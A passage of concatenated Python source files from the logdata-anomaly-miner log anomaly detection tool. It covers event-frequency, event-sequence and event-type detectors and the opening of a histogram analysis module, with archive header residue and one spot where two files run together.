take as many as possible self.counts[tuple(log_event)] = freqs[max(0, len(freqs) - num_windows - 1):] + [0] if len(self.scoring_path_list) > 0: self.scoring_value_list[tuple(log_event)] = [] logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + ' loaded persistence data.') def receive_atom(self, log_atom): """Receive a log atom from a source.""" parser_match = log_atom.parser_match self.log_total += 1 if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".") self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return log_event = tuple(values) # Get values that occur in unique_path_list unique_path_value = None if self.unique_path_list is not None and len(self.unique_path_list) != 0: values = [] for path in self.unique_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) values.append(value) # Initialize unique values for current log event if log_event not in self.unique_values: self.unique_values[log_event] = set() unique_path_value = tuple(values) # Store copy of last seen instance of raw log event to correctly show affected event type when anomaly occurs. self.last_seen_log[log_event] = log_atom if self.next_check_time is None: # First processed log atom, initialize next check time. self.next_check_time = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time: # Log atom exceeded next check time; time window is complete. self.next_check_time = self.next_check_time + self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time: skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time) / self.window_size) self.next_check_time = self.next_check_time + skipped_windows * self.window_size # Output anomaly in case that no log event occurs within a time window if self.empty_window_warnings is True: analysis_component = {'AffectedLogAtomPaths': self.target_path_list} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'No log events received in time window', [''], event_data, log_atom, self) for log_ev in self.counts: # Check if ranges should be initialised if log_ev not in self.ranges: self.ranges[log_ev] = None self.exceeded_range_frequency[log_ev] = False # Calculate the ranges if it was not already calculated if self.ranges[log_ev] is None: self.ranges[log_ev] = self.calculate_range(log_ev) if log_ev not in self.counts or (len(self.counts[log_ev]) < 2 and ( self.set_lower_limit is None or self.set_upper_limit is None)): # At least counts from 1 window necessary for prediction self.reset_counter(log_ev) continue # Compare log event frequency of previous time windows and current time window if self.counts[log_ev][-1] < self.ranges[log_ev][0] or self.counts[log_ev][-1] > self.ranges[log_ev][1]: occurrences_mean = (self.ranges[log_ev][0] + self.ranges[log_ev][1]) / 2 try: data = self.last_seen_log[log_ev].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.last_seen_log[log_ev].raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.last_seen_log[log_ev].parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_ev)} frequency_info = {'ExpectedLogAtomValuesFrequency': occurrences_mean, 'ExpectedLogAtomValuesFrequencyRange': [ np.ceil(max(0, self.ranges[log_ev][0])), np.floor(self.ranges[log_ev][1])], 'LogAtomValuesFrequency': self.counts[log_ev][-1], 'WindowSize': self.window_size, 'ConfidenceFactor': self.confidence_factor, 'Confidence': 1 - min(occurrences_mean, self.counts[log_ev][-1]) / max(occurrences_mean, self.counts[log_ev][-1])} # In case that scoring_path_list is set, give their values to the event handlers for further analysis. if len(self.scoring_path_list) > 0: frequency_info['IdValues'] = self.scoring_value_list[log_ev] event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency anomaly detected', sorted_log_lines, event_data, self.last_seen_log[log_ev], self) # Reset exceeded_range_frequency to output a warning when the count exceedes the ranges next time self.exceeded_range_frequency[log_ev] = False # Reset counter and range estimation for _ in range(skipped_windows + 1): self.reset_counter(log_ev) self.ranges[log_ev] = None # Reset all stored unique values for every log event for log_ev in self.unique_values: self.unique_values[log_ev] = set() elif self.early_exceeding_anomaly_output and log_event in self.counts and (len(self.counts[log_event]) >= 2 or ( self.set_lower_limit is not None and self.set_upper_limit is not None)): # Check if the count exceeds the range and output a warning the first time the range exceeds it if log_event not in self.ranges: self.ranges[log_event] = None self.exceeded_range_frequency[log_event] = False # Calculate the ranges if it was not already calculated if self.ranges[log_event] is None: self.ranges[log_event] = self.calculate_range(log_event) # Compare log event frequency of previous time windows and current time window if self.counts[log_event][-1] > self.ranges[log_event][1] and not self.exceeded_range_frequency[log_event]: occurrences_mean = (self.ranges[log_event][0] + self.ranges[log_event][1]) / 2 self.exceeded_range_frequency[log_event] = True try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_event)} frequency_info = {'ExpectedLogAtomValuesFrequency': occurrences_mean, 'ExpectedLogAtomValuesFrequencyRange': [ np.ceil(max(0, self.ranges[log_event][0])), np.floor(self.ranges[log_event][1])], 'LogAtomValuesFrequency': self.counts[log_event][-1], 'WindowSize': self.window_size, 'ConfidenceFactor': self.confidence_factor} event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency exceeds range for the first time', sorted_log_lines, event_data, log_atom, self) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Increase count for observed events if log_event in self.counts: if unique_path_value is not None: # When unique path is set, only increase count when value has not been observed before if unique_path_value not in self.unique_values[log_event]: self.counts[log_event][-1] += 1 self.unique_values[log_event].add(unique_path_value) else: self.counts[log_event][-1] += 1 else: self.counts[log_event] = [1] self.log_success += 1 def reset_counter(self, log_event): """Create count index for new time window""" if self.learn_mode is True: if len(self.counts[log_event]) <= self.num_windows + 1: self.counts[log_event].append(0) else: self.counts[log_event] = self.counts[log_event][1:] + [0] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: self.counts[log_event][-1] = 0 # Reset scoring_value_list if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = [] def calculate_range(self, log_event): """Calculate the corresponding range to log_event.""" if self.set_lower_limit is None or self.set_upper_limit is None: if log_event not in self.counts or len(self.counts[log_event]) < 2: return None occurrences_mean = -1 occurrences_std = -1 occurrences_mean = np.mean(self.counts[log_event][-self.num_windows-1:-1]) if len(self.counts[log_event][-self.num_windows-1:-1]) > 1: # Only compute standard deviation for at least 2 observed counts occurrences_std = np.std(self.counts[log_event][-self.num_windows-1:-1]) else: # Otherwise use default value so that only (1 - confidence_factor) relevant (other factor cancels out) occurrences_std = occurrences_mean * (1 - self.confidence_factor) # Calculate limits if self.set_lower_limit is not None: lower_limit = self.set_lower_limit else: lower_limit = occurrences_mean - occurrences_std / self.confidence_factor if self.set_upper_limit is not None: upper_limit = self.set_upper_limit else: upper_limit = occurrences_mean + occurrences_std / self.confidence_factor return [lower_limit, upper_limit] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] for log_ev, freqs in self.counts.items(): # Skip last count as the time window may not be complete yet and count thus too low persist_data.append((log_ev, freqs[:-1])) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + ' persisted data.') def print_persistency_event(self, event_type, event_data): """ Prints the persistency of component_name. Event_data specifies what information is outputed. @return a message with information about the persistency. @throws Exception when the output for the event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and (self.target_path_list is None or ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)])) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = 'Event_data has the wrong format. ' \ 'The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same ' \ 'length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.counts.keys()) values_list = list(values_set) values_list.sort() string = f'Event frequency is tracked for the following path values: {values_list}' elif len(event_data) == 1: # Print the current count, the frequency interval and the time when the counter resets if event_data[0] in self.ranges and self.ranges[event_data[0]] is None and len(self.counts[event_data[0]]) > 1: self.ranges[event_data[0]] = self.calculate_range(event_data[0]) # Set output string if event_data[0] in self.counts and self.ranges[event_data[0]] is not None: if self.counts[event_data[0]][-1] < self.ranges[event_data[0]][0] or\ self.counts[event_data[0]][-1] > self.ranges[event_data[0]][1]: string = f'The current count {self.counts[event_data[0]][-1]} is outside the frequency interval ['\ f'{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. '\ f'The count will reset at {self.next_check_time} (unix time stamp)' else: string = f'The current count {self.counts[event_data[0]][-1]} is in the frequency interval ['\ f'{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. '\ f'The count will reset at {self.next_check_time} (unix time stamp)' else: string = f'Persistency includes no information for {event_data[0]}.' return string def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + ' out of ' + str(self.log_total) + ' log atoms successfully in ' + str(self.log_windows) + " time windows in the last 60 minutes.") elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + ' out of ' + str(self.log_total) + ' log atoms successfully in ' + str(self.log_windows) + " time windows in the last 60 minutes.") self.log_success = 0 self.log_total = 0 self.log_windows = 0 def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ['FrequencyData', 'IdValues'] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ['FrequencyData', 'Scoring'] return [] EventSequenceDetector.py000066400000000000000000000376451437606560100356100ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest, S., Hofmeyr, S. A., Somayaji, A., & Longstaff, T. A. (1996, May). A sense of self for unix processes. In Proceedings of the 1996 IEEE Symposium on Security and Privacy (pp. 120-128). IEEE. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventSequenceDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when new event or value sequences were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, seq_len=3, allow_missing_id=False, timeout=-1, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available. @param seq_len the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param timeout maximum allowed seconds between two entries of sequence; sequence is split in subsequences if exceeded. @param persistence_id name of persistence file. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, seq_len=seq_len, allow_missing_id=allow_missing_id, timeout=timeout, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.sequences = set() self.current_sequences = {} self.last_seen_times = {} self.log_learned = 0 self.log_learned_sequences = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Persisted data contains lists of sequences, i.e., [[, ], [. """ import time import logging from aminer import AminerConfig from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class EventTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class keeps track of the found event types and the values of each variable.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', target_path_list=None, id_path_list=None, allow_missing_id=False, allowed_id_tuples=None, min_num_vals=1000, max_num_vals=1500, save_values=True): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param id_path_list specifies group identifiers for which data should be learned/analyzed. One or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param min_num_vals number of the values which the list of stored logline values is being reduced to. @param max_num_vals the maximum list size of the stored logline values before being reduced to the last min_num_values. @param save_values if false the values of the log atom are not saved for further analysis. This disables values and check_variables. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( mutable_default_args=["id_path_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, id_path_list=id_path_list, allow_missing_id=allow_missing_id, allowed_id_tuples=allowed_id_tuples, min_num_vals=min_num_vals, max_num_vals=max_num_vals, save_values=save_values ) self.num_events = 0 self.longest_path = [] # List of the longest path of the events self.found_keys = [] # List of the keys corresponding to the events self.variable_key_list = [] # List of the keys, which take values in the log line # List of the values of the log lines. If the length reaches max_num_vals the list gets reduced to min_num_vals values per variable self.values = [] self.num_event_lines = [] # Saves the number of lines of the event types self.total_records = 0 # Saves the number of total log lines # List of the modules which follow the event_type_detector. The implemented modules are form the list # [VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector] self.following_modules = [] self.check_variables = [] # List of bools, which state if the variables of variable_key_list are updated. # List ot the time trigger. The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.etd_time_trigger = [[], [], []] self.num_event_lines_tsa_ref = [] # Reference containing the number of lines of the events for the TSA self.current_index = 0 # Index of the event type of the current log line self.id_path_list_tuples = [] # List of the id tuples # Loads the persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if persistence_data is not None: for key in persistence_data[0]: self.found_keys.append(set(key)) self.variable_key_list = persistence_data[1] self.values = persistence_data[2] self.longest_path = persistence_data[3] self.check_variables = persistence_data[4] self.num_event_lines = persistence_data[5] self.id_path_list_tuples = [tuple(tuple_list) for tuple_list in persistence_data[6]] self.num_events = len(self.found_keys) def receive_atom(self, log_atom): """Receives a parsed atom and keeps track of the event types and the values of the variables of them.""" self.log_total += 1 valid_log_atom = False if self.target_path_list: for path in self.target_path_list: if path in log_atom.parser_match.get_match_dictionary().keys(): valid_log_atom = True break if self.target_path_list and not valid_log_atom: self.current_index = -1 return False self.total_records += 1 # Get the current index, either from the combination of values of the paths of id_path_list, or the event type if self.id_path_list: # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ('',) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Check if only certain tuples are allowed and if the tuple is included. if self.allowed_id_tuples != [] and id_tuple not in self.allowed_id_tuples: self.current_index = -1 return False # Searches if the id_tuple has previously appeared current_index = -1 for event_index, var_key in enumerate(self.id_path_list_tuples): if id_tuple == var_key: current_index = event_index else: # Searches if the event type has previously appeared current_index = -1 for event_index in range(self.num_events): if self.longest_path[event_index] in log_atom.parser_match.get_match_dictionary() and set( log_atom.parser_match.get_match_dictionary()) == self.found_keys[event_index]: current_index = event_index # Initialize a new event type if the event type of the new line has not appeared if current_index == -1: current_index = self.num_events self.num_events += 1 self.found_keys.append(set(log_atom.parser_match.get_match_dictionary().keys())) # Initialize the list of the keys to the variables self.variable_key_list.append(list(self.found_keys[current_index])) # Delete the entries with value None or timestamps as values for var_index in range(len(self.variable_key_list[current_index]) - 1, -1, -1): if (type(log_atom.parser_match.get_match_dictionary()[self.variable_key_list[current_index][var_index]]).__name__ != 'MatchElement') or (log_atom.parser_match.get_match_dictionary()[self.variable_key_list[ current_index][var_index]].match_object is None): del self.variable_key_list[current_index][var_index] elif (self.target_path_list is not None) and self.variable_key_list[current_index][var_index] not in self.target_path_list: del self.variable_key_list[current_index][var_index] # Initialize the empty lists for the values and initialize the check_variables list for the variables if self.save_values: self.init_values(current_index) self.check_variables.append([True for _ in range(len(self.variable_key_list[current_index]))]) self.num_event_lines.append(0) if not self.id_path_list: # String of the longest found path self.longest_path.append('') # Number of forward slashes in the longest path tmp_int = 0 if self.target_path_list is None: for var_key in self.variable_key_list[current_index]: if var_key is not None: count = var_key.count('/') if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(var_key)): self.longest_path[current_index] = var_key tmp_int = count else: for found_key in list(self.found_keys[current_index]): if found_key is None: found_key = "" count = found_key.count('/') if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(found_key)): self.longest_path[current_index] = found_key tmp_int = count else: self.id_path_list_tuples.append(id_tuple) self.current_index = current_index if self.save_values: # Appends the values to the event type self.append_values(log_atom, current_index) self.num_event_lines[current_index] += 1 self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" tmp_list = [[]] for key in self.found_keys: tmp_list[0].append(list(key)) tmp_list.append(self.variable_key_list) tmp_list.append(self.values) tmp_list.append(self.longest_path) tmp_list.append(self.check_variables) tmp_list.append(self.num_event_lines) tmp_list.append(self.id_path_list_tuples) PersistenceUtil.store_json(self.persistence_file_name, tmp_list) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def add_following_modules(self, following_module): """Add the given Module to the following module list.""" self.following_modules.append(following_module) logging.getLogger(DEBUG_LOG_NAME).debug( "%s added following module %s.", self.__class__.__name__, following_module.__class__.__name__) def init_values(self, current_index): """Initialize the variable_key_list and the list for the values.""" # Initializes the value list if not self.values: self.values = [[[] for _ in range(len(self.variable_key_list[current_index]))]] else: self.values.append([[] for _ in range(len(self.variable_key_list[current_index]))]) def append_values(self, log_atom, current_index): """Add the values of the variables of the current line to self.values.""" for var_index, var_key in enumerate(self.variable_key_list[current_index]): # Skips the variable if check_variable is False, or if the var_key is not included in the match_dict if not self.check_variables[current_index][var_index]: continue if var_key not in log_atom.parser_match.get_match_dictionary(): self.values[current_index][var_index] = [] self.check_variables[current_index][var_index] = False continue raw_match_object = '' if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytearray): raw_match_object = repr( bytes(log_atom.parser_match.get_match_dictionary()[var_key].match_object))[2:-1] elif isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytes): raw_match_object = repr(log_atom.parser_match.get_match_dictionary()[var_key].match_object)[2:-1] # Try to convert the values to floats and add them as values try: if raw_match_object != '': self.values[current_index][var_index].append(float(raw_match_object)) else: self.values[current_index][var_index].append( float(log_atom.parser_match.get_match_dictionary()[var_key].match_object)) # Add the strings as values except: # skipcq: FLK-E722 if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_string, bytes): self.values[current_index][var_index].append( repr(log_atom.parser_match.get_match_dictionary()[var_key].match_string)[2:-1]) else: self.values[current_index][var_index].append(log_atom.parser_match.get_match_dictionary()[var_key].match_string) # Reduce the numbers of entries in the value list if len(self.variable_key_list[current_index]) > 0 and len([i for i in self.check_variables[current_index] if i]) > 0 and \ len(self.values[current_index][self.check_variables[current_index].index(True)]) > self.max_num_vals: for var_index in range(len(self.variable_key_list[current_index])): # skipcq: PTC-W0060 # Skips the variable if check_variable is False if not self.check_variables[current_index][var_index]: continue self.values[current_index][var_index] = self.values[current_index][var_index][-self.min_num_vals:] def get_event_type(self, event_index): """Return a string which includes information about the event type.""" if self.id_path_list: return_string = str(event_index) + '(' + str(self.id_path_list_tuples[event_index]) + ')' else: return_string = str(event_index) + '(' + str(self.longest_path[event_index]) + ')' return return_string HistogramAnalysis.py000066400000000000000000000700721437606560100347740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function moduloTimeBinDefinition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogramAnalysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [('/model/line/time', moduloTimeBinDefinition)], 3600*24*7, # Reporting interval (weekly) anomaly_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atomFilter.addHandler(histogramAnalysis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import abc import logging from datetime import datetime from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface binomial_test = None try: from scipy import stats binomial_test = stats.binom_test # skipcq: FLK-E722 except: pass date_string = "%Y-%m-%d %H:%M:%S" class BinDefinition(metaclass=abc.ABCMeta): """This class defines the bins of the histogram.""" @abc.abstractmethod def __init__(self): """Initiate the BinDefinition.""" @abc.abstractmethod def has_outlier_bins(self): """ Report if this binning works with outlier bins, that are bins for all values outside the normal binning range. If not, outliers are discarded. When true, the outlier bins are the first and last bin. """ @abc.abstractmethod def get_bin_names(self): """Get the names of the bins for reporting, including the outlier bins if any.""" @abc.abstractmethod def get_bin(self, value): """ Get the number of the bin this value should belong to. @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin with outliers below limit, first normal bin is at index 1. """ @abc.abstractmethod def get_bin_p_value(self, bin_pos, total_values, bin_values): """ Calculate a p-Value, how likely the observed number of 